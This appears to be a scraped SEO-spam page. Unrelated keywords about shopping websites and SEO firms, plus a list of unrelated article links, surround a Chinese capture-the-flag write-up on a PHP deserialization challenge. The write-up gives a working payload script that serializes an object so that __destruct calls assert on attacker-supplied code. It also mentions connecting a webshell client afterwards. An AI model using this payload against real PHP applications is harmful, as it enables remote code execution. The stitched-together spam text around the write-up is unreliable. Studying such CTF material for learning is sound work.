当前位置: 首页 > news >正文

做一个网购网站需要怎么做seo深度优化公司

做一个网购网站需要怎么做,seo深度优化公司,长沙网站建设qq交流群,北京市建筑工程装饰集团有限公司打开题目 直接查看源代码 打开源代码发现了个./time.php?source 访问一下 审计代码: 现存在反序列化语句:$ppp unserialize($_GET["data"]);和执行漏洞:echo $b($a); 发现在__destruct()方法里面有 echo $b($a); 这个是php的…

打开题目

直接查看源代码

 打开源代码发现了个./time.php?source

访问一下

审计代码:

现存在反序列化语句:@$ppp = unserialize($_GET["data"]);和执行漏洞:echo $b($a);

发现在__destruct()方法里面有 echo $b($a);

这个是php的特性,php可以通过这种方法动态调用方法。

思路很简单,只要把$b赋值为方法名字,吧$a赋值成调用的参数就行了。

payload

<?php
#error_reporting(0);
class HelloPhp
{public $a;public $b;public function __construct(){$this->a = "phpinfo()";$this->b = "assert";}public function __destruct(){$a = $this->a;$b = $this->b;echo $b($a);}
}
$c = new HelloPhp;@$ppp = serialize($c);
echo $ppp;
?>

将得到的payload上传

发现成功了,于是可以用蚁剑连接,但是这个题目用蚁剑连接以后是空白一片,于是考虑可能是在phpinfo()里面

得到flag

http://www.hengruixuexiao.com/news/18092.html

相关文章:

  • dede怎么做网站app推广代理
  • 怎么做自己公司的app南宁网站seo外包
  • wordpress 内容编辑器郑州seo使用教程
  • 微信开发小程序公司淘宝seo搜索排名优化
  • 做博彩类的网站网络营销策划总结
  • 网站建设代码下载大全百度网盘手机版
  • 网站开发外包合同模板权威发布
  • 怎么做网站排名会更好重庆电子商务网站seo
  • 一家专门做海报的网站seo网站推广免费
  • 网站群建设规范南京seo招聘
  • wordpress4.1搜索引擎营销优化的方法
  • 深圳建设工程质量安全智能监管平台网站网站百度收录秒收方法
  • 长安网站建设上海搜索排名优化
  • 网站开发 高职课本b2b平台是什么意思啊
  • 网站的宣传推广包括公司官网优化方案
  • 贵阳市网站做的最好的个人外包接单平台
  • 德国网站的后缀名人力资源和社会保障部
  • 广东省建设工程执业资格注册中心网站怀化网站seo
  • 个人做网站怎么备案电商培训机构哪家好
  • 做dj音叉网站平台平台推广精准客源
  • 做系统进化树的网站百度app客服人工在线咨询
  • 三水网站建设首选公司网站运营推广方案
  • 镇平县两学一做网站免费注册网站
  • 长沙网站优化掌营天下最近一周的时政热点新闻
  • 网站设计计费厦门网络推广培训
  • 石狮做网站高平网站优化公司
  • 信息化建设 调查报告 乡镇网站公司的网站
  • 网站链接怎么做跳转厦门seo推广外包
  • 网站套餐方案谷歌seo招聘
  • 如何做淘宝代购网站一份完整的活动策划方案